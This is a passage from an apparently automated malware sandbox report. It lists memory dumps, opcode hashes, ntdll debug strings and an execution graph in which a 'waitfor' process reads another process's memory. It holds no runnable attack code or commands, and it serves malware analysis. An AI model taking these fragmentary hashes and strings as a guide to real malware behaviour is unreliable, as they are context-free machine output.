                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: ffeac7d15699fcf73e187b7e9abb2c830825932d2c65f140094f420c4b4d3d82
                                                                                                                                                                                • Instruction ID: d076e49c8dfdf6b2f4653b647ac3ee14d78a5677f14660f2874afceecf9408e4
                                                                                                                                                                                • Opcode Fuzzy Hash: ffeac7d15699fcf73e187b7e9abb2c830825932d2c65f140094f420c4b4d3d82
                                                                                                                                                                                • Instruction Fuzzy Hash: 6C90022531200842D502665845146060009C7D1347F91C817E1414D15DC635895BB132
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 8b5dbf10c5719dd0ea1e6280549c43273cd5112eef375790455d8ceb21a8377e
                                                                                                                                                                                • Instruction ID: fe61407b8a5426f6c6fc0b23681350cf258dae0d044cd7894654189309b2b502
                                                                                                                                                                                • Opcode Fuzzy Hash: 8b5dbf10c5719dd0ea1e6280549c43273cd5112eef375790455d8ceb21a8377e
                                                                                                                                                                                • Instruction Fuzzy Hash: 1890022561200942D50176584504616000A87D0243F91C827A1014D15ECA35899AB131
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                                                • Instruction ID: 8a475219ec332924acf6f8ae17669815ba2d7517c2e6d33356581d9eab484f19
                                                                                                                                                                                • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                                                • Instruction Fuzzy Hash:

                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                • String ID: HEAP:
                                                                                                                                                                                • API String ID: 3446177414-2466845122
                                                                                                                                                                                • Opcode ID: 89bd6301f89cdc74bea36739f0e432ec1871555608818dd1a660837beffa210e
                                                                                                                                                                                • Instruction ID: b2c2a6c1bccbddb255877cd11f3e2c7a81da225e0f440bc403b31774c1e4de89
                                                                                                                                                                                • Opcode Fuzzy Hash: 89bd6301f89cdc74bea36739f0e432ec1871555608818dd1a660837beffa210e
                                                                                                                                                                                • Instruction Fuzzy Hash: 0FA15575B143128BD704CF28C894A2AB7E5FB88750F08457DE985EB351EB70EC4ACB95

                                                                                                                                                                                Strings
                                                                                                                                                                                • Execute=1, xrefs: 333A451E
                                                                                                                                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 333A454D
                                                                                                                                                                                • ExecuteOptions, xrefs: 333A44AB
                                                                                                                                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 333A4530
                                                                                                                                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 333A4592
                                                                                                                                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 333A4460
                                                                                                                                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 333A4507
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                • API String ID: 0-484625025
                                                                                                                                                                                • Opcode ID: 81d7d3e01ceffc674614f5bdb5c004b2aa17e7ebccb5628c9d5f34844f3190ae
                                                                                                                                                                                • Instruction ID: e902d8ac50a6f1334c0c9d89da9b6be45519b24b7383f6432467f63713eee9b3
                                                                                                                                                                                • Opcode Fuzzy Hash: 81d7d3e01ceffc674614f5bdb5c004b2aa17e7ebccb5628c9d5f34844f3190ae
                                                                                                                                                                                • Instruction Fuzzy Hash: 93513975E00309AEEF109E98ECD5FA973ACEF04344F8485E9E505A7585DA709A41CF54
                                                                                                                                                                                Strings
                                                                                                                                                                                • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 333977E2
                                                                                                                                                                                • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 33397807
                                                                                                                                                                                • SsHd, xrefs: 3334A304
                                                                                                                                                                                • Actx , xrefs: 33397819, 33397880
                                                                                                                                                                                • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 333978F3
                                                                                                                                                                                • RtlpFindActivationContextSection_CheckParameters, xrefs: 333977DD, 33397802
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                                                                                                                                • API String ID: 0-1988757188
                                                                                                                                                                                • Opcode ID: 44715b6e1473dd8371bacf35083e6627f1c33546c3fda81b79cef9b2ea3b5413
                                                                                                                                                                                • Instruction ID: 768c760f9b8ab240c25cc6cc775782add93f80fd180d3ad6f312789e33948f35
                                                                                                                                                                                • Opcode Fuzzy Hash: 44715b6e1473dd8371bacf35083e6627f1c33546c3fda81b79cef9b2ea3b5413
                                                                                                                                                                                • Instruction Fuzzy Hash: 50E1C174A083018FE714CF64C88675A77E9BB84364F588A6DF9A5CB3D0E731D885CB92
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 33399372
                                                                                                                                                                                • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 33399153
                                                                                                                                                                                • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 33399178
                                                                                                                                                                                • GsHd, xrefs: 3334D794
                                                                                                                                                                                • Actx , xrefs: 33399315
                                                                                                                                                                                • RtlpFindActivationContextSection_CheckParameters, xrefs: 3339914E, 33399173
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                                                                                                                                • API String ID: 3446177414-2196497285
                                                                                                                                                                                • Opcode ID: 90613d918ccb4c056f2b8bc5b8708a6168d8c2d34bf7f332d781e2997a40d4fa
                                                                                                                                                                                • Instruction ID: 44a08c3890c38466250b5ba28e55ba83c4a81f16e48a222348048371c3079b71
                                                                                                                                                                                • Opcode Fuzzy Hash: 90613d918ccb4c056f2b8bc5b8708a6168d8c2d34bf7f332d781e2997a40d4fa
                                                                                                                                                                                • Instruction Fuzzy Hash: DEE1A274A44342DFE710CF14C8C0B6AB7E8BF88354F498A6DE995DB292D771E844CB92
                                                                                                                                                                                APIs
                                                                                                                                                                                • RtlDebugPrintTimes.NTDLL ref: 3332651C
                                                                                                                                                                                  • Part of subcall function 33326565: RtlDebugPrintTimes.NTDLL ref: 33326614
                                                                                                                                                                                  • Part of subcall function 33326565: RtlDebugPrintTimes.NTDLL ref: 3332665F
                                                                                                                                                                                Strings
                                                                                                                                                                                • Getting the shim engine exports failed with status 0x%08lx, xrefs: 33389790
                                                                                                                                                                                • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 3338977C
                                                                                                                                                                                • apphelp.dll, xrefs: 33326446
                                                                                                                                                                                • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 333897B9
                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 333897A0, 333897C9
                                                                                                                                                                                • LdrpInitShimEngine, xrefs: 33389783, 33389796, 333897BF
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                • API String ID: 3446177414-204845295
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                                                                                                                                                • API String ID: 3446177414-4227709934
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                • String ID: $$@$@wBv
                                                                                                                                                                                • API String ID: 3446177414-2843144836
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                                                                                                                                                • API String ID: 3446177414-3492000579
                                                                                                                                                                                Strings
                                                                                                                                                                                • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 33389885
                                                                                                                                                                                • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 33389843
                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 33389854, 33389895
                                                                                                                                                                                • LdrpLoadShimEngine, xrefs: 3338984A, 3338988B
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                • API String ID: 3446177414-3589223738
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                                                                                                                                • API String ID: 3446177414-3224558752
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                                                                                                                                                • API String ID: 3446177414-1222099010
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                                                                                                                                                • String ID: ^Qc
                                                                                                                                                                                • API String ID: 4281723722-3751124073
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                • API String ID: 3446177414-3610490719
                                                                                                                                                                                • Opcode ID: 6d884e0844970dfa5bb83283d0b8f7d6996b08153aaa709bcde4c29688403238
                                                                                                                                                                                • Instruction ID: 6a6bf58542d598354cb21469d17aae4b57a97e47126a4558e4760ec868550797
                                                                                                                                                                                • Opcode Fuzzy Hash: 6d884e0844970dfa5bb83283d0b8f7d6996b08153aaa709bcde4c29688403238
                                                                                                                                                                                • Instruction Fuzzy Hash: 6C913571B45740AFE315DF25C880B2ABBE9FF84B40F04C659E885DBA91DB34E845CB92
                                                                                                                                                                                Strings
                                                                                                                                                                                • Failed to allocated memory for shimmed module list, xrefs: 33399F1C
                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 33399F2E
                                                                                                                                                                                • LdrpCheckModule, xrefs: 33399F24
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                • API String ID: 3446177414-161242083
                                                                                                                                                                                • Opcode ID: a6150a4e20df56615880ff3dac5786d1e09d6da9bbf341475daa7a4641e24006
                                                                                                                                                                                • Instruction ID: a021c078f9c88bca6313010ee2a7b771a53b5c0663213663b5eb7ab6866d4547
                                                                                                                                                                                • Opcode Fuzzy Hash: a6150a4e20df56615880ff3dac5786d1e09d6da9bbf341475daa7a4641e24006
                                                                                                                                                                                • Instruction Fuzzy Hash: BE719C75E00205DFEB04DF68C890FAEB7F8EB44608F18C469E846F7651E779A942CB50
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a4230b12d78f8940f5814a2e09ba239290564a0edf52b26cd32b6758808f14ee
                                                                                                                                                                                • Instruction ID: 5090123d16baf96837337542a094aff817fa6fcb087e813a5c94e8286c735635
                                                                                                                                                                                • Opcode Fuzzy Hash: a4230b12d78f8940f5814a2e09ba239290564a0edf52b26cd32b6758808f14ee
                                                                                                                                                                                • Instruction Fuzzy Hash: 4EE1F175D40708CFEB25CFA9D980A9DBBF9FF48340F18862AE485A7664DB74A941CF10
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                                                                • Opcode ID: 5b9c839087df7209e5cab6da5e2cf65215d582ebca8cf02bd9974f9211fcdd9c
                                                                                                                                                                                • Instruction ID: c27d26598bb020f18f4a3bc79c5f4f2007e2ff9d9cf1b4c21f7891434ddbf6cc
                                                                                                                                                                                • Opcode Fuzzy Hash: 5b9c839087df7209e5cab6da5e2cf65215d582ebca8cf02bd9974f9211fcdd9c
                                                                                                                                                                                • Instruction Fuzzy Hash: EA5188787146169FEB08CF18C9A0A29B3E6BB89350B18417DD956DB720DB71EC4ACF84
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                                                                • Opcode ID: 42833c20d9b5366fc9625f2a9a686f6aca7d729b214e1cf2f074180b5e8a39f5
                                                                                                                                                                                • Instruction ID: ff5efa35b7f7032d4ec36cb95b36cae87c718e0aab1a07f3cebbda432567450b
                                                                                                                                                                                • Opcode Fuzzy Hash: 42833c20d9b5366fc9625f2a9a686f6aca7d729b214e1cf2f074180b5e8a39f5
                                                                                                                                                                                • Instruction Fuzzy Hash: CB5122B6E022199FEB04CF99C844ADDBBF6FF48355F05812AE805BB260DB349905CF54
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: @
                                                                                                                                                                                • API String ID: 0-2766056989
                                                                                                                                                                                • Opcode ID: 3e93102211053215340c73f2eaba5505e76575c854fa1277cf71fc8e67f57d6a
                                                                                                                                                                                • Instruction ID: e42eb536fc7d0062a11a8780673316eff88f63cc1d513a683754956c1344eb08
                                                                                                                                                                                • Opcode Fuzzy Hash: 3e93102211053215340c73f2eaba5505e76575c854fa1277cf71fc8e67f57d6a
                                                                                                                                                                                • Instruction Fuzzy Hash: D3324474D46329CFEB22CF64C884BD9BBB4AF0A324F04C1E9D449A7651DB749A84CF91
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: HEAP: ${=3
                                                                                                                                                                                • API String ID: 0-2155003802
                                                                                                                                                                                • Opcode ID: 86e50b6df68612b733f1c2601b7dcb64b15407ceeb6af8133a9b429a8a8792fc
                                                                                                                                                                                • Instruction ID: 3d66d159d3c1d283ecf9bd218adbca3eb6160096e1b88e7a00b8fd83145ed9d7
                                                                                                                                                                                • Opcode Fuzzy Hash: 86e50b6df68612b733f1c2601b7dcb64b15407ceeb6af8133a9b429a8a8792fc
                                                                                                                                                                                • Instruction Fuzzy Hash: 88B19E76A093019FD710CF28D880A1BB7E9EF84755F548A6EF994DF2A0D730E944CB52
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 0$Flst
                                                                                                                                                                                • API String ID: 0-758220159
                                                                                                                                                                                • Opcode ID: 1803510534785ce613833a7ed85386d35ddee87756269c7dd7aa443e8243b42d
                                                                                                                                                                                • Instruction ID: a316e5823d2df4d56b9514a3278da3b9ccc53ddc490658519732b03b1bfcbbd1
                                                                                                                                                                                • Opcode Fuzzy Hash: 1803510534785ce613833a7ed85386d35ddee87756269c7dd7aa443e8243b42d
                                                                                                                                                                                • Instruction Fuzzy Hash: 2E519DB5E006089FEB14DF98C9C4759FBF8EF44758F18C02AD445AB294EB709985CB80
                                                                                                                                                                                Strings
                                                                                                                                                                                • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 33330586
                                                                                                                                                                                • kLsE, xrefs: 333305FE
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                                                                • API String ID: 3446177414-2547482624
                                                                                                                                                                                • Opcode ID: 60797c972373d39c0b47d10b44a5e8e9ce75780f8f6cc88477b22309a1de406f
                                                                                                                                                                                • Instruction ID: 4702c2f75a3590ac6d356884a1e6c7c1a3c1b792816b6cd7074363a90835b7c1
                                                                                                                                                                                • Opcode Fuzzy Hash: 60797c972373d39c0b47d10b44a5e8e9ce75780f8f6cc88477b22309a1de406f
                                                                                                                                                                                • Instruction Fuzzy Hash: 7751DEB5A46746DFE714DFA4C8806EAB7E8AF06310F00C43ED5D6D7610EB789509CB62
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                • String ID: ^23
                                                                                                                                                                                • API String ID: 3446177414-4160069314
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                • String ID: 0$0
                                                                                                                                                                                • API String ID: 3446177414-203156872
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 333CAABF
                                                                                                                                                                                • ^Qc, xrefs: 333CAAD1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p$^Qc
                                                                                                                                                                                • API String ID: 3446177414-881798178
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                • String ID: 23$m23
                                                                                                                                                                                • API String ID: 3446177414-3319721989

                                                                                                                                                                                Execution Graph

                                                                                                                                                                                Execution Coverage:0.5%
                                                                                                                                                                                Dynamic/Decrypted Code Coverage:88.2%
                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                Total number of Nodes:17
                                                                                                                                                                                Total number of Limit Nodes:2
                                                                                                                                                                                execution_graph 73480 5202b20 73482 5202b2a 73480->73482 73483 5202b31 73482->73483 73484 5202b3f LdrInitializeThunk 73482->73484 73493 52029f0 LdrInitializeThunk 73499 5091e98 73500 5091ef0 73499->73500 73501 5091f24 73500->73501 73504 508f038 73500->73504 73503 5091f01 73505 508f05d 73504->73505 73506 508f1da NtQueryInformationProcess 73505->73506 73509 508f24d 73505->73509 73507 508f214 73506->73507 73508 508f2f2 NtReadVirtualMemory 73507->73508 73507->73509 73508->73509 73509->73503 73510 2fd9a67 NtClose 73511 2fd9a98 73510->73511

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 0 508f038-508f05b 1 508f079-508f099 call 5091308 call 508d0a8 0->1 2 508f05d-508f074 call 50912e8 0->2 8 508f68a-508f695 1->8 9 508f09f-508f1ab call 508ef68 call 5091308 call 5095274 call 5080398 call 50908c8 call 5080398 call 50908c8 call 5092fd8 1->9 2->1 26 508f67e-508f685 call 508ef68 9->26 27 508f1b1-508f24b call 5080398 call 50908c8 NtQueryInformationProcess call 5091308 call 5080398 call 50908c8 9->27 26->8 39 508f24d-508f25a 27->39 40 508f25f-508f2db call 5095282 call 5080398 call 50908c8 27->40 39->26 40->39 49 508f2e1-508f2f0 call 50952ac 40->49 52 508f33d-508f383 call 5080398 call 50908c8 call 5093938 49->52 53 508f2f2-508f333 NtReadVirtualMemory call 5091ff8 49->53 62 508f3a2-508f49e call 5080398 call 50908c8 call 50952ba call 5080398 call 50908c8 call 50932f8 call 50912b8 * 3 call 50952ac 52->62 63 508f385-508f39d 52->63 56 508f338 53->56 56->26 86 508f4a0-508f4cf call 50952ac call 50912b8 call 509530e call 50952c8 62->86 87 508f4d1-508f4e6 call 50952ac 62->87 63->26 99 508f526-508f530 86->99 93 508f4e8-508f50a call 5092aa8 87->93 94 508f50f-508f521 call 5091f38 87->94 93->94 94->99 101 508f5f5-508f65e call 5080398 call 50908c8 call 5093c58 99->101 102 508f536-508f586 call 5080398 call 50908c8 call 5093618 call 50952ac 99->102 101->26 127 508f660-508f679 call 50912e8 101->127 120 508f588-508f5b1 call 5095358 call 509530e 102->120 121 508f5bb-508f5c3 call 50952ac 102->121 120->121 121->101 129 508f5c5-508f5d0 121->129 127->26 129->101 131 508f5d2-508f5f0 call 5093f78 129->131 131->101
                                                                                                                                                                                APIs
                                                                                                                                                                                • NtQueryInformationProcess.NTDLL ref: 0508F1F9
                                                                                                                                                                                • NtReadVirtualMemory.NTDLL ref: 0508F30D
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.33482449989.0000000005080000.00000040.00000800.00020000.00000000.sdmp, Offset: 05080000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_5080000_waitfor.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InformationMemoryProcessQueryReadVirtual
                                                                                                                                                                                • String ID: 0$~,VH$OR+
                                                                                                                                                                                • API String ID: 1498878907-4020732180

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 134 2fd9a67-2fd9a90 NtClose 135 2fd9a98-2fd9aa5 134->135
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.33480220140.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FB0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_2fb0000_waitfor.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Close
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3535843008-0
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.33482540954.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
